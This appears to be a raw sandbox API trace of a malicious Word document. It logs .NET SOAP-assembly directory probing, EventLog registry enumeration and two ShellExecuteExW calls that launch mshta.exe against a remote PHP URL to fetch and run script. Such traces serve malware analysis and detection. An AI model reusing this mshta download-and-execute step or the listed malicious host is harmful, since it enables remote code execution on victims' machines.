[0062.907] GetFullPathNameW (in: lpFileName="http100www4samyrai777m4p-host4in0t0tp4php2thread90.dll", nBufferLength=0x105, lpBuffer=0x27a440, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop\\http100www4samyrai777m4p-host4in0t0tp4php2thread90.dll", lpFilePart=0x0) returned 0x50
[0062.907] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop\\http100www4samyrai777m4p-host4in0t0tp4php2thread90.dll", nBufferLength=0x105, lpBuffer=0x27a310, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop\\http100www4samyrai777m4p-host4in0t0tp4php2thread90.dll", lpFilePart=0x0) returned 0x50
[0062.909] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x7d2cc90
[0062.909] RtlMoveMemory (in: Destination=0x7d2cc90, Source=0xa682e78, Length=0x3c | out: Destination=0x7d2cc90)
[0062.909] LocalAlloc (uFlags=0x0, uBytes=0x64) returned 0x7b44480
[0062.909] RtlMoveMemory (in: Destination=0x7b44480, Source=0xa6831d8, Length=0x64 | out: Destination=0x7b44480)
[0062.909] ShellExecuteExW (in: pExecInfo=0xa6833e0*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="C:\\Windows\\System32\\mshta.exe", lpParameters="http://www.samyrai777m.p-host.in/t/t.php?thread=0", lpDirectory=0x0, nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0xa6833e0*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="C:\\Windows\\System32\\mshta.exe", lpParameters="http://www.samyrai777m.p-host.in/t/t.php?thread=0", lpDirectory=0x0, nShow=1, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0xc2c)) returned 1
[0062.969] LocalFree (hMem=0x7d2cc90) returned 0x0
[0062.969] LocalFree (hMem=0x7b44480) returned 0x0
[0066.946] SysStringByteLen (bstr="http://www.samyrai777m.p-host.in/t/tp.php?thread=0") returned 0x64
[0066.946] SysStringByteLen (bstr="http://www.samyrai777m.p-host.in/t/tp.php?thread=0") returned 0x64
[0066.946] SysStringByteLen (bstr="clientactivated") returned 0x1e
[0066.946] SysStringByteLen (bstr="clientactivated") returned 0x1e
[0066.946] CoTaskMemAlloc (cb=0x804) returned 0x799d320
[0066.946] GetSystemDirectoryW (in: lpBuffer=0x799d320, uSize=0x400 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
[0066.946] CoTaskMemFree (pv=0x799d320)
[0066.946] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\com\\SOAPAssembly\\", nBufferLength=0x105, lpBuffer=0x274fe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\com\\SOAPAssembly\\", lpFilePart=0x0) returned 0x25
[0066.947] SetErrorMode (uMode=0x1) returned 0x8001
[0066.947] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\com\\SOAPAssembly\\" (normalized: "c:\\windows\\system32\\com\\soapassembly"), fInfoLevelId=0x0, lpFileInformation=0x2751f0 | out: lpFileInformation=0x2751f0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0066.948] SetErrorMode (uMode=0x8001) returned 0x1
[0066.948] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\com\\SOAPAssembly\\", nBufferLength=0x105, lpBuffer=0x274ff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\com\\SOAPAssembly\\", lpFilePart=0x0) returned 0x25
[0066.948] SetErrorMode (uMode=0x1) returned 0x8001
[0066.948] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\com\\SOAPAssembly" (normalized: "c:\\windows\\system32\\com\\soapassembly"), fInfoLevelId=0x0, lpFileInformation=0x275110 | out: lpFileInformation=0x275110*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0066.949] SetErrorMode (uMode=0x8001) returned 0x1
[0066.949] SetErrorMode (uMode=0x1) returned 0x8001
[0066.949] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\com" (normalized: "c:\\windows\\system32\\com"), fInfoLevelId=0x0, lpFileInformation=0x275110 | out: lpFileInformation=0x275110*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfece69ac, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1da26978, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1da26978, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
[0066.950] SetErrorMode (uMode=0x8001) returned 0x1
[0066.950] SetErrorMode (uMode=0x1) returned 0x8001
[0066.950] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x275110 | out: lpFileInformation=0x275110*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb3c9890, ftCreationTime.dwHighDateTime=0x1d30211, ftLastAccessTime.dwLowDateTime=0x60dd8710, ftLastAccessTime.dwHighDateTime=0x1d30212, ftLastWriteTime.dwLowDateTime=0x60dd8710, ftLastWriteTime.dwHighDateTime=0x1d30212, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
[0066.950] SetErrorMode (uMode=0x8001) returned 0x1
[0066.950] SetErrorMode (uMode=0x1) returned 0x8001
[0066.950] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x275110 | out: lpFileInformation=0x275110*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb3a3730, ftCreationTime.dwHighDateTime=0x1d30211, ftLastAccessTime.dwLowDateTime=0xde098210, ftLastAccessTime.dwHighDateTime=0x1d30614, ftLastWriteTime.dwLowDateTime=0xde098210, ftLastWriteTime.dwHighDateTime=0x1d30614, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
[0066.950] SetErrorMode (uMode=0x8001) returned 0x1
[0066.951] CreateDirectoryW (lpPathName="C:\\Windows\\system32\\com\\SOAPAssembly" (normalized: "c:\\windows\\system32\\com\\soapassembly"), lpSecurityAttributes=0x0) returned 0
[0066.963] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x272ba8 | out: phkResult=0x272ba8*=0x5c0) returned 0x0
[0066.964] RegQueryInfoKeyW (in: hKey=0x5c0, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x272b1c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x272b18, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x272b1c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x272b18*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0066.965] CoTaskMemFree (pv=0x0)
[0066.965] CoTaskMemAlloc (cb=0x204) returned 0x5ab6ec0
[0066.965] RegEnumKeyExW (in: hKey=0x5c0, dwIndex=0x0, lpName=0x5ab6ec0, lpcchName=0x272ba8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x272ba8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0066.965] CoTaskMemFree (pv=0x5ab6ec0)
[0066.965] CoTaskMemFree (pv=0x0)
[0066.965] CoTaskMemAlloc (cb=0x204) returned 0x5ab6ec0
[0066.965] RegEnumKeyExW (in: hKey=0x5c0, dwIndex=0x1, lpName=0x5ab6ec0, lpcchName=0x272ba8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x272ba8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0066.965] CoTaskMemFree (pv=0x5ab6ec0)
[0066.965] CoTaskMemFree (pv=0x0)
[0066.965] CoTaskMemAlloc (cb=0x204) returned 0x5ab6ec0
[0066.965] RegEnumKeyExW (in: hKey=0x5c0, dwIndex=0x2, lpName=0x5ab6ec0, lpcchName=0x272ba8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x272ba8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0066.965] CoTaskMemFree (pv=0x5ab6ec0)
[0066.965] CoTaskMemFree (pv=0x0)
[0066.965] CoTaskMemAlloc (cb=0x204) returned 0x5ab6ec0
[0066.965] RegEnumKeyExW (in: hKey=0x5c0, dwIndex=0x3, lpName=0x5ab6ec0, lpcchName=0x272ba8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x272ba8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0066.965] CoTaskMemFree (pv=0x5ab6ec0)
[0066.965] CoTaskMemFree (pv=0x0)
[0066.965] CoTaskMemAlloc (cb=0x204) returned 0x5ab6ec0
[0066.965] RegEnumKeyExW (in: hKey=0x5c0, dwIndex=0x4, lpName=0x5ab6ec0, lpcchName=0x272ba8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x272ba8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0066.965] CoTaskMemFree (pv=0x5ab6ec0)
[0066.965] CoTaskMemFree (pv=0x0)
[0066.965] CoTaskMemAlloc (cb=0x204) returned 0x5ab6ec0
[0066.965] RegEnumKeyExW (in: hKey=0x5c0, dwIndex=0x5, lpName=0x5ab6ec0, lpcchName=0x272ba8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x272ba8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0066.966] CoTaskMemFree (pv=0x5ab6ec0)
[0066.966] CoTaskMemFree (pv=0x0)
[0066.966] CoTaskMemAlloc (cb=0x204) returned 0x5ab6ec0
[0066.966] RegEnumKeyExW (in: hKey=0x5c0, dwIndex=0x6, lpName=0x5ab6ec0, lpcchName=0x272ba8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x272ba8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0066.966] CoTaskMemFree (pv=0x5ab6ec0)
[0066.966] CoTaskMemFree (pv=0x0)
[0066.966] CoTaskMemAlloc (cb=0x204) returned 0x5ab6ec0
[0066.966] RegEnumKeyExW (in: hKey=0x5c0, dwIndex=0x7, lpName=0x5ab6ec0, lpcchName=0x272ba8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x272ba8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0066.966] CoTaskMemFree (pv=0x5ab6ec0)
[0066.966] CoTaskMemFree (pv=0x0)
[0066.966] CoTaskMemAlloc (cb=0x204) returned 0x5ab6ec0
[0066.966] RegEnumKeyExW (in: hKey=0x5c0, dwIndex=0x8, lpName=0x5ab6ec0, lpcchName=0x272ba8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x272ba8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0066.966] CoTaskMemFree (pv=0x5ab6ec0)
[0066.966] CoTaskMemFree (pv=0x0)
[0066.966] RegOpenKeyExW (in: hKey=0x5c0, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x272c08 | out: phkResult=0x272c08*=0xbf0) returned 0x0
[0066.966] RegOpenKeyExW (in: hKey=0xbf0, lpSubKey="COM+ SOAP Services", ulOptions=0x0, samDesired=0x20019, phkResult=0x272c08 | out: phkResult=0x272c08*=0x0) returned 0x2
[0066.966] RegOpenKeyExW (in: hKey=0x5c0, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x272c08 | out: phkResult=0x272c08*=0xd2c) returned 0x0
[0066.966] RegOpenKeyExW (in: hKey=0xd2c, lpSubKey="COM+ SOAP Services", ulOptions=0x0, samDesired=0x20019, phkResult=0x272c08 | out: phkResult=0x272c08*=0x0) returned 0x2
[0066.967] RegOpenKeyExW (in: hKey=0x5c0, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x272c08 | out: phkResult=0x272c08*=0xc58) returned 0x0
[0066.967] RegOpenKeyExW (in: hKey=0xc58, lpSubKey="COM+ SOAP Services", ulOptions=0x0, samDesired=0x20019, phkResult=0x272c08 | out: phkResult=0x272c08*=0x0) returned 0x2
[0066.967] RegOpenKeyExW (in: hKey=0x5c0, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x272c08 | out: phkResult=0x272c08*=0xc54) returned 0x0
[0066.967] RegOpenKeyExW (in: hKey=0xc54, lpSubKey="COM+ SOAP Services", ulOptions=0x0, samDesired=0x20019, phkResult=0x272c08 | out: phkResult=0x272c08*=0x0) returned 0x2
[0066.967] RegOpenKeyExW (in: hKey=0x5c0, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x272c08 | out: phkResult=0x272c08*=0xc50) returned 0x0
[0066.967] RegOpenKeyExW (in: hKey=0xc50, lpSubKey="COM+ SOAP Services", ulOptions=0x0, samDesired=0x20019, phkResult=0x272c08 | out: phkResult=0x272c08*=0x0) returned 0x2
[0066.967] RegOpenKeyExW (in: hKey=0x5c0, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x272c08 | out: phkResult=0x272c08*=0xc24) returned 0x0
[0066.968] RegOpenKeyExW (in: hKey=0xc24, lpSubKey="COM+ SOAP Services", ulOptions=0x0, samDesired=0x20019, phkResult=0x272c08 | out: phkResult=0x272c08*=0x0) returned 0x2
[0066.968] RegOpenKeyExW (in: hKey=0x5c0, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x272c08 | out: phkResult=0x272c08*=0x0) returned 0x5
[0066.976] RegOpenKeyExW (in: hKey=0x5c0, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x272c08 | out: phkResult=0x272c08*=0xd94) returned 0x0
[0066.976] RegOpenKeyExW (in: hKey=0xd94, lpSubKey="COM+ SOAP Services", ulOptions=0x0, samDesired=0x20019, phkResult=0x272c08 | out: phkResult=0x272c08*=0x0) returned 0x2
[0066.976] RegOpenKeyExW (in: hKey=0x5c0, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x272c08 | out: phkResult=0x272c08*=0xd98) returned 0x0
[0066.976] RegOpenKeyExW (in: hKey=0xd98, lpSubKey="COM+ SOAP Services", ulOptions=0x0, samDesired=0x20019, phkResult=0x272c08 | out: phkResult=0x272c08*=0x0) returned 0x2
[0066.983] RegCloseKey (hKey=0x5c0) returned 0x0
[0066.985] GetFullPathNameW (in: lpFileName="http100www4samyrai777m4p-host4in0t0tp4php2thread90.dll", nBufferLength=0x105, lpBuffer=0x275070, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop\\http100www4samyrai777m4p-host4in0t0tp4php2thread90.dll", lpFilePart=0x0) returned 0x50
[0066.985] SetErrorMode (uMode=0x1) returned 0x8001
[0066.985] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop\\http100www4samyrai777m4p-host4in0t0tp4php2thread90.dll" (normalized: "c:\\users\\aetadzjz\\desktop\\http100www4samyrai777m4p-host4in0t0tp4php2thread90.dll"), fInfoLevelId=0x0, lpFileInformation=0x275280 | out: lpFileInformation=0x275280*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd5210210, ftCreationTime.dwHighDateTime=0x1d34cee, ftLastAccessTime.dwLowDateTime=0xd5210210, ftLastAccessTime.dwHighDateTime=0x1d34cee, ftLastWriteTime.dwLowDateTime=0xd5210210, ftLastWriteTime.dwHighDateTime=0x1d34cee, nFileSizeHigh=0x0, nFileSizeLow=0x1200)) returned 1
[0066.985] SetErrorMode (uMode=0x8001) returned 0x1
[0066.985] GetFullPathNameW (in: lpFileName="http100www4samyrai777m4p-host4in0t0tp4php2thread90.dll", nBufferLength=0x105, lpBuffer=0x274fd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop\\http100www4samyrai777m4p-host4in0t0tp4php2thread90.dll", lpFilePart=0x0) returned 0x50
[0066.985] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop\\http100www4samyrai777m4p-host4in0t0tp4php2thread90.dll", nBufferLength=0x105, lpBuffer=0x274ea0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop\\http100www4samyrai777m4p-host4in0t0tp4php2thread90.dll", lpFilePart=0x0) returned 0x50
[0066.986] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x7d2da00
[0066.986] RtlMoveMemory (in: Destination=0x7d2da00, Source=0xa68fe50, Length=0x3c | out: Destination=0x7d2da00)
[0066.986] LocalAlloc (uFlags=0x0, uBytes=0x64) returned 0x2e6f230
[0066.986] RtlMoveMemory (in: Destination=0x2e6f230, Source=0xa6901b0, Length=0x64 | out: Destination=0x2e6f230)
[0066.986] ShellExecuteExW (in: pExecInfo=0xa6903b8*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="C:\\Windows\\System32\\mshta.exe", lpParameters="http://www.samyrai777m.p-host.in/t/t.php?thread=0", lpDirectory=0x0, nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0xa6903b8*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="C:\\Windows\\System32\\mshta.exe", lpParameters="http://www.samyrai777m.p-host.in/t/t.php?thread=0", lpDirectory=0x0, nShow=1, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0xdb0)) returned 1
[0067.047] LocalFree (hMem=0x7d2da00) returned 0x0
[0067.048] LocalFree (hMem=0x2e6f230) returned 0x0
Thread:
id = 16
os_tid = 0xb04
Thread:
id = 17
os_tid = 0xb08
Thread:
id = 18
os_tid = 0xb0c
Thread:
id = 19
os_tid = 0xb18
Thread:
id = 20
os_tid = 0xb24
Thread:
id = 21
os_tid = 0xb28
Thread:
id = 22
os_tid = 0xb2c
Thread:
id = 23
os_tid = 0xb54
Thread:
id = 24
os_tid = 0xb58
[0041.733] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
Thread:
id = 25
os_tid = 0xb5c
Thread:
id = 26
os_tid = 0x0
Thread:
id = 27
os_tid = 0xb60
[0043.340] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
[0043.535] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xa7c
[0043.537] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xa80
[0043.771] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.config", nBufferLength=0x105, lpBuffer=0x231ae4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.config", lpFilePart=0x0) returned 0x3e
[0043.771] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.config", nBufferLength=0x105, lpBuffer=0x231ae3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.config", lpFilePart=0x0) returned 0x3e
[0043.781] CoTaskMemAlloc (cb=0x20c) returned 0x7db54d0
[0043.781] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x7db54d0, nSize=0x104 | out: lpFilename="C:\\Program Files\\Microsoft Office\\Root\\Office16\\WINWORD.EXE" (normalized: "c:\\program files\\microsoft office\\root\\office16\\winword.exe")) returned 0x3b
[0043.782] CoTaskMemFree (pv=0x7db54d0)
[0043.782] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Root\\Office16\\WINWORD.EXE", nBufferLength=0x105, lpBuffer=0x231ae500, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\Root\\Office16\\WINWORD.EXE", lpFilePart=0x0) returned 0x3b
[0043.900] GetVersionExW (in: lpVersionInformation=0x231ae3d0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x231ae3d0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0043.901] GetCurrentProcess () returned 0xffffffffffffffff
[0043.902] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x231ae468 | out: TokenHandle=0x231ae468*=0xa84) returned 1
[0043.907] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\", nBufferLength=0x105, lpBuffer=0x231ae0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\", lpFilePart=0x0) returned 0x30
[0043.924] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x231ae510 | out: lpFileInformation=0x231ae510*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf9bf7e3, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xdf9bf7e3, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x3f871a3e, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x65b3)) returned 1
[0043.925] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x231ae060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x45
[0043.925] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x231ae4c0 | out: lpFileInformation=0x231ae4c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf9bf7e3, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xdf9bf7e3, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x3f871a3e, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x65b3)) returned 1
[0043.928] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x231adea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x45
[0043.928] SetErrorMode (uMode=0x1) returned 0x8001
[0043.929] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xa94
[0043.930] GetFileType (hFile=0xa94) returned 0x1
[0043.930] SetErrorMode (uMode=0x8001) returned 0x1
[0043.930] GetFileType (hFile=0xa94) returned 0x1
[0043.965] GetFileSize (in: hFile=0xa94, lpFileSizeHigh=0x231ae4b8 | out: lpFileSizeHigh=0x231ae4b8*=0x0) returned 0x65b3
[0043.967] ReadFile (in: hFile=0xa94, lpBuffer=0xa5c16b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x231ae3d8, lpOverlapped=0x0 | out: lpBuffer=0xa5c16b0*, lpNumberOfBytesRead=0x231ae3d8*=0x1000, lpOverlapped=0x0) returned 1
[0044.011] ReadFile (in: hFile=0xa94, lpBuffer=0xa5c16b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x231ae0b8, lpOverlapped=0x0 | out: lpBuffer=0xa5c16b0*, lpNumberOfBytesRead=0x231ae0b8*=0x1000, lpOverlapped=0x0) returned 1
[0044.012] ReadFile (in: hFile=0xa94, lpBuffer=0xa5c16b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x231adf08, lpOverlapped=0x0 | out: lpBuffer=0xa5c16b0*, lpNumberOfBytesRead=0x231adf08*=0x1000, lpOverlapped=0x0) returned 1
[0044.012] ReadFile (in: hFile=0xa94, lpBuffer=0xa5c16b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x231adf08, lpOverlapped=0x0 | out: lpBuffer=0xa5c16b0*, lpNumberOfBytesRead=0x231adf08*=0x1000, lpOverlapped=0x0) returned 1
[0044.012] ReadFile (in: hFile=0xa94, lpBuffer=0xa5c16b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x231adf08, lpOverlapped=0x0 | out: lpBuffer=0xa5c16b0*, lpNumberOfBytesRead=0x231adf08*=0x1000, lpOverlapped=0x0) returned 1
[0044.030] ReadFile (in: hFile=0xa94, lpBuffer=0xa5c16b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x231ae048, lpOverlapped=0x0 | out: lpBuffer=0xa5c16b0*, lpNumberOfBytesRead=0x231ae048*=0x1000, lpOverlapped=0x0) returned 1
[0044.030] ReadFile (in: hFile=0xa94, lpBuffer=0xa5c16b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x231ade68, lpOverlapped=0x0 | out: lpBuffer=0xa5c16b0*, lpNumberOfBytesRead=0x231ade68*=0x5b3, lpOverlapped=0x0) returned 1
[0044.030] ReadFile (in: hFile=0xa94, lpBuffer=0xa5c16b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x231ae018, lpOverlapped=0x0 | out: lpBuffer=0xa5c16b0*, lpNumberOfBytesRead=0x231ae018*=0x0, lpOverlapped=0x0) returned 1
[0044.031] CloseHandle (hObject=0xa94) returned 1
[0044.032] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.config", nBufferLength=0x105, lpBuffer=0x231ae490, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.config", lpFilePart=0x0) returned 0x3e
[0044.032] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.config", nBufferLength=0x105, lpBuffer=0x231ae390, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.config", lpFilePart=0x0) returned 0x3e
[0044.033] CoTaskMemAlloc (cb=0x20c) returned 0x7db6ce0
[0044.033] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x7db6ce0, nSize=0x104 | out: lpFilename="C:\\Program Files\\Microsoft Office\\Root\\Office16\\WINWORD.EXE" (normalized: "c:\\program files\\microsoft office\\root\\office16\\winword.exe")) returned 0x3b
[0044.033] CoTaskMemFree (pv=0x7db6ce0)
